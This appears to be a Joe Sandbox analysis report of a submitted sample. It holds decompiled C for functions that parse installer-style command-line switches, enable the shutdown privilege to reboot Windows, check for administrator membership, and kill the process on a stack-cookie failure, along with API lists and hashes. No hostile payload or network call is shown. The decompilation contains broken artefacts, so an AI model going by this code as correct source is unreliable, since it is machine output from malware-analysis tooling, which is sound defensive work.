APIs

GlobalFree.KERNEL32 ref: 00EB4CC8

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 11f32c91944d90c24233658a64834accbff82b63bac38ae481d6d97bba4cb72a
Instruction ID: c2f21d0c96a76bb5075ed5fab019a4ff90f43deadb3d84304e8c1df83ce4ac68
Opcode Fuzzy Hash: 11f32c91944d90c24233658a64834accbff82b63bac38ae481d6d97bba4cb72a
Instruction Fuzzy Hash: 48B0123100010CBBCF012B43EC088463F1DD7C0260B040020F50C410218B7398118585

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00EB5C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00EB5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0xeb8004; // 0x92ae1240
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00EB6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00EB6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0xeb8004; // 0x92ae1240
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E00EB597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E00EB44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0xeb9124 = E00EB6285();
									_t75 = 0;
								}
								return E00EB6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E00EB44B9(0, 0x521, 0xeb1140, 0, 0x40, 0);
												_t85 =  *0xeb8588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E00EB667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E00EB667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00EB5C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00EB1680(0xeb8c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E00EB667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E00EB667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0xeb8a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00EB5C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0xeb8b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0xeb8a3a;
																}
																E00EB1680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E00EB658A(_t218, 0x104, 0xeb1140);
																if(E00EB31E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0xeb8a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0xeb8a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0xeb8a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0xeb8a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0xeb8a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0xeb9a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0xeb9a2c =  *0xeb9a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0xeb8d48 =  *0xeb8d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0xeb9a2c =  *0xeb9a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0xeb9a2c =  *0xeb9a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0xeb8d48 =  *0xeb8d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0xeb9a2c =  *0xeb9a2c | 0x00000004;
																										L70:
																										 *0xeb8a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0xeb9a2c = 3;
																	 *0xeb8a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0xeb8a2c != 0 &&  *0xeb8b3e == 0) {
						if(GetModuleFileNameA( *0xeb9a3c, 0xeb8b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E00EB66C8(0xeb8b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}

0x00eb5c9e
0x00eb5ca9
0x00eb5cb0
0x00eb5cb3
0x00eb5cb6
0x00eb5cb7
0x00eb5cb8
0x00eb5cbd
0x00eb6204
0x00eb5ccb
0x00000000
0x00eb5ccb
0x00eb5cd3
0x00eb5cd7
0x00eb5cf4
0x00000000
0x00eb5cf4
0x00eb5cf8
0x00eb5d00
0x00000000
0x00eb5d06
0x00eb5d06
0x00eb5d0e
0x00eb5d10
0x00eb5d12
0x00eb5d14
0x00eb5d15
0x00eb5d17
0x00eb5d49
0x00000000
0x00000000
0x00000000
0x00000000
0x00eb5d19
0x00eb5d19
0x00eb5d1d
0x00000000
0x00eb5d3f
0x00eb5d3f
0x00eb5d4b
0x00eb5d4b
0x00eb5d4f
0x00eb5d8d
0x00000000
0x00eb5d93
0x00eb5d93
0x00eb5d9a
0x00eb5d9d
0x00eb5d9e
0x00000000
0x00eb5d9e
0x00eb5d51
0x00eb5d5b
0x00eb5d72
0x00eb60fb
0x00eb60fb
0x00eb6207
0x00eb620a
0x00eb620b
0x00eb620e
0x00eb6217
0x00eb5d78
0x00eb5d78
0x00eb5d80
0x00eb5d83
0x00eb5d84
0x00000000
0x00eb5d84
0x00eb5d5d
0x00eb5d5f
0x00eb5d62
0x00eb5d68
0x00eb5d64
0x00eb5d64
0x00eb5d64
0x00000000
0x00eb5d62
0x00eb5d5b
0x00eb5d4f
0x00eb5d1d
0x00000000
0x00eb5d9f
0x00eb5d9f
0x00eb5da5
0x00eb5dab
0x00eb5dba
0x00eb6218
0x00eb621d
0x00eb6220
0x00eb6221
0x00eb6229
0x00eb6230
0x00eb6247
0x00eb626a
0x00eb6272
0x00eb6249
0x00eb6255
0x00eb625f
0x00eb6264
0x00eb6264
0x00eb6284
0x00eb5dc0
0x00eb5dc0
0x00eb5dca
0x00eb5e22
0x00000000
0x00000000
0x00000000
0x00000000
0x00eb5dcc
0x00eb5dce
0x00eb5e24
0x00eb5e24
0x00eb5e2c
0x00eb5e47
0x00eb5e4a
0x00eb61d2
0x00eb61e2
0x00eb61e7
0x00eb61ee
0x00eb61f1
0x00eb61f1
0x00eb61f8
0x00eb61f8
0x00eb5e50
0x00eb5e53
0x00eb6109
0x00eb611f
0x00000000
0x00eb6125
0x00eb6137
0x00eb613a
0x00eb613c
0x00eb613e
0x00eb613e
0x00eb6141
0x00eb6141
0x00eb6143
0x00eb6144
0x00eb614a
0x00000000
0x00eb6150
0x00eb6152
0x00eb615c
0x00eb6170
0x00eb6172
0x00eb617c
0x00eb6190
0x00eb6190
0x00eb6196
0x00eb61a5
0x00000000
0x00eb61ab
0x00eb61b9
0x00eb61c6
0x00eb61c6
0x00eb617e
0x00eb6180
0x00eb618a
0x00000000
0x00000000
0x00000000
0x00000000
0x00eb618a
0x00eb615e
0x00eb6160
0x00eb616a
0x00000000
0x00000000
0x00000000
0x00000000
0x00eb616a
0x00eb615c
0x00eb614a
0x00eb610b
0x00eb610e
0x00eb610e
0x00000000
0x00eb5e59
0x00eb5e59
0x00eb5e5c
0x00eb604f
0x00eb6056
0x00000000
0x00eb605c
0x00eb606e
0x00eb6071
0x00eb6073
0x00eb6075
0x00eb6075
0x00eb6078
0x00eb6078
0x00eb607a
0x00eb607b
0x00eb6081
0x00000000
0x00eb6087
0x00eb6087
0x00eb608d
0x00eb609c
0x00000000
0x00eb60a2
0x00eb60aa
0x00eb60b2
0x00eb60b7
0x00eb60bd
0x00eb60bf
0x00eb60bf
0x00eb60d6
0x00eb60e0
0x00eb60e7
0x00eb60f5
0x00000000
0x00000000
0x00000000
0x00000000
0x00eb60f5
0x00eb609c
0x00eb6081
0x00eb5e62
0x00eb5e62
0x00eb5e65
0x00eb5fd3
0x00eb5fe9
0x00000000
0x00eb5fef
0x00eb5fef
0x00eb5ff7
0x00eb5ffd
0x00eb6003
0x00eb6006
0x00eb6011
0x00eb6014
0x00eb603d
0x00eb6016
0x00eb6018
0x00eb6019
0x00eb601b
0x00eb6033
0x00eb601d
0x00eb6020
0x00eb6029
0x00eb6022
0x00eb6022
0x00eb6022
0x00eb6020
0x00eb601b
0x00eb6042
0x00eb6044
0x00eb6046
0x00eb604a
0x00eb5ff7
0x00eb5fd5
0x00eb5fd8
0x00eb5fd8
0x00000000
0x00eb5e6b
0x00eb5e6b
0x00eb5e6e
0x00eb5f8b
0x00eb5f99
0x00000000
0x00eb5f9f
0x00eb5fa7
0x00eb5faf
0x00000000
0x00eb5fb1
0x00eb5fb3
0x00000000
0x00eb5fb5
0x00eb5fb7
0x00000000
0x00eb5fb9
0x00000000
0x00eb5fb9
0x00eb5fb7
0x00eb5fb3
0x00eb5faf
0x00eb5f8d
0x00eb5f8d
0x00eb5f8d
0x00eb5f8f
0x00eb5fc1
0x00eb5fc1
0x00eb5fc1
0x00000000
0x00eb5e74
0x00eb5e74
0x00eb5e77
0x00eb5ea0
0x00eb5ebd
0x00eb5f79
0x00000000
0x00eb5f7f
0x00eb5ec3
0x00eb5ec3
0x00eb5ecc
0x00eb5ed4
0x00eb5ed6
0x00eb5edc
0x00eb5edf
0x00eb5eea
0x00eb5eed
0x00eb5f3f
0x00eb5f40
0x00000000
0x00eb5eef
0x00eb5eef
0x00eb5ef2
0x00eb5f34
0x00eb5ef4
0x00eb5ef4
0x00eb5ef7
0x00eb5f2b
0x00000000
0x00eb5ef9
0x00eb5ef9
0x00eb5efc
0x00eb5f22
0x00000000
0x00eb5efe
0x00eb5eff
0x00eb5f02
0x00eb5f16
0x00eb5f04
0x00eb5f07
0x00eb5f0d
0x00eb5f46
0x00eb5f46
0x00eb5f09
0x00eb5f09
0x00eb5f09
0x00eb5f07
0x00eb5f02
0x00eb5efc
0x00eb5ef7
0x00eb5ef2
0x00eb5f4c
0x00eb5f4e
0x00eb5f50
0x00eb5f54
0x00eb5ed4
0x00eb5ea2
0x00eb5ea4
0x00eb5eaf
0x00eb5eaf
0x00000000
0x00eb5e79
0x00eb5e7d
0x00000000
0x00eb5e83
0x00eb5e83
0x00eb5e83
0x00eb5e85
0x00eb5e85
0x00eb5e8e
0x00000000
0x00eb5e94
0x00000000
0x00eb5e94
0x00eb5e8e
0x00eb5e7d
0x00eb5e77
0x00eb5e6e
0x00eb5e65
0x00eb5e5c
0x00000000
0x00000000
0x00000000
0x00eb5dd0
0x00eb5dd0
0x00eb5dd0
0x00000000
0x00eb5dd0
0x00eb5dce
0x00eb5dca
0x00eb5dba
0x00000000
0x00eb5d00
0x00eb5dd9
0x00eb5e04
0x00eb61fe
0x00eb5e0a
0x00eb5e0c
0x00eb5e17
0x00eb5e17
0x00eb5e04
0x00eb6200
0x00eb6200
0x00000000

APIs

CharNextA.USER32(?,00000000,?,?), ref: 00EB5CEE
GetModuleFileNameA.KERNEL32(00EB8B3E,00000104,00000000,?,?), ref: 00EB5DFC
CharUpperA.USER32(?), ref: 00EB5E3E
CharUpperA.USER32(-00000052), ref: 00EB5EE1
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00EB5F6F
CharUpperA.USER32(?), ref: 00EB5FA7
CharUpperA.USER32(-0000004E), ref: 00EB6008
CharUpperA.USER32(?), ref: 00EB60AA
CloseHandle.KERNEL32(00000000,00EB1140,00000000,00000040,00000000), ref: 00EB61F1
ExitProcess.KERNEL32 ref: 00EB61F8

Strings

:, xrefs: 00EB6118
", xrefs: 00EB5D78
RegServer, xrefs: 00EB5F66
", xrefs: 00EB612D

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: 27f662dfb9f283098f1a279c654fda65086e9bab313072c8beff55b2299da685
Instruction ID: 04233e6db18a55b31d925749516bc746076b73732552f8c980c498453a9f75e4
Opcode Fuzzy Hash: 27f662dfb9f283098f1a279c654fda65086e9bab313072c8beff55b2299da685
Instruction Fuzzy Hash: 81D15E73A04A455EDF368B3D8C487FB7BA5AB16308F1462AAC4C6F6191D7748E86CF01

Uniqueness

Uniqueness Score: -1.00%

Function 00EB1F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00EB1F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0xeb9a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0xeb8004; // 0x92ae1240
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E00EB44B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00EB6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E00EB44B9(0, 0x522, 0xeb1140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00EB1EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

0x00eb1f90
0x00eb1f90
0x00eb1f93
0x00eb1f98
0x00eb1fa4
0x00eb1fa7
0x00eb1fc5
0x00eb1fcd
0x00eb1fdb
0x00eb1ee5
0x00eb1eea
0x00eb1ef1
0x00eb1ef4
0x00eb1f0c
0x00eb1f2e
0x00eb1f3a
0x00eb1f46
0x00eb1f4d
0x00eb1f58
0x00eb1f60
0x00eb1f61
0x00eb1f62
0x00eb1f75
0x00eb1f80
0x00eb1f77
0x00eb1f77
0x00000000
0x00eb1f77
0x00eb1f64
0x00eb1f64
0x00000000
0x00eb1f64
0x00eb1f0e
0x00eb1f0e
0x00eb1f13
0x00eb1f13
0x00eb1f14
0x00eb1f14
0x00eb1f16
0x00eb1f17
0x00eb1f1a
0x00eb1f1f
0x00eb1f1f
0x00eb1f86
0x00eb1f8f
0x00eb1fcf
0x00eb1fd3
0x00000000
0x00eb1fd3
0x00eb1fa9
0x00eb1fb4
0x00eb1fbb
0x00eb1fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x00eb1fc3
0x00eb1f9a
0x00eb1f9a
0x00eb1fa2
0x00eb1fd9
0x00eb1fda
0x00000000
0x00000000
0x00000000
0x00eb1fa2

APIs

GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00EB1EFB
OpenProcessToken.ADVAPI32(00000000), ref: 00EB1F02
ExitWindowsEx.USER32(00000002,00000000), ref: 00EB1FD3

Strings

SeShutdownPrivilege, xrefs: 00EB1F28

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: bed30463e5d530ccd16366883cb47a23db024e416168ea43883c4022656a2751
Instruction ID: 7dad1e0a5da6da364f4e1b3cc9e42b5791d48fc398702a481ac163a49e0e602a
Opcode Fuzzy Hash: bed30463e5d530ccd16366883cb47a23db024e416168ea43883c4022656a2751
Instruction Fuzzy Hash: 592129B1B002057FDB205BA69C1AFFF76BCEF85B64F541168FA02F6181D7748805D661

Uniqueness

Uniqueness Score: -1.00%

Function 00EB17EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00EB17EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0xeb8004; // 0x92ae1240
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0xeba288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E00EB6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x00eb17f6
0x00eb17fd
0x00eb1805
0x00eb180b
0x00eb180d
0x00eb1815
0x00eb1818
0x00eb1820
0x00eb1824
0x00eb182c
0x00eb1832
0x00eb1837
0x00eb1851
0x00eb1854
0x00eb185d
0x00eb1862
0x00eb186c
0x00eb1872
0x00eb1877
0x00eb187e
0x00eb187e
0x00eb1883
0x00eb1883
0x00eb185d
0x00eb188a
0x00eb188a
0x00eb18a2

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00EB18DD), ref: 00EB181A
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00EB182C
AllocateAndInitializeSid.ADVAPI32(00EB18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00EB18DD), ref: 00EB1855
FreeSid.ADVAPI32(?,?,?,?,00EB18DD), ref: 00EB1883
FreeLibrary.KERNEL32(00000000,?,?,?,00EB18DD), ref: 00EB188A

Strings

CheckTokenMembership, xrefs: 00EB1826
advapi32.dll, xrefs: 00EB1810

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: 0133285995e38bf5d53560256f8e440debd14f6cb876085bc613d127dfc8854c
Instruction ID: eced8f0c9b92391d0cc5089ea9ca6ddd6af0f6c37e62cd7ae2ef52cb6247259a
Opcode Fuzzy Hash: 0133285995e38bf5d53560256f8e440debd14f6cb876085bc613d127dfc8854c
Instruction Fuzzy Hash: 43119331E00209AFDB15AFA5DC5AABFBBB8FF44710F540179FA01F2290DA309D048B91

Uniqueness

Uniqueness Score: -1.00%

Function 00EB6CF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EB6CF0(char _a4) {

				SetUnhandledExceptionFilter(0);
				_t1 =  &_a4; // 0xeb6e26
				UnhandledExceptionFilter( *_t1);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00eb6cf7
0x00eb6cfd
0x00eb6d00
0x00eb6d19

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00EB6E26,00EB1000), ref: 00EB6CF7
UnhandledExceptionFilter.KERNEL32(&n,?,00EB6E26,00EB1000), ref: 00EB6D00
GetCurrentProcess.KERNEL32(C0000409,?,00EB6E26,00EB1000), ref: 00EB6D0B
TerminateProcess.KERNEL32(00000000,?,00EB6E26,00EB1000), ref: 00EB6D12

Strings

&n, xrefs: 00EB6CFD

Memory Dump Source

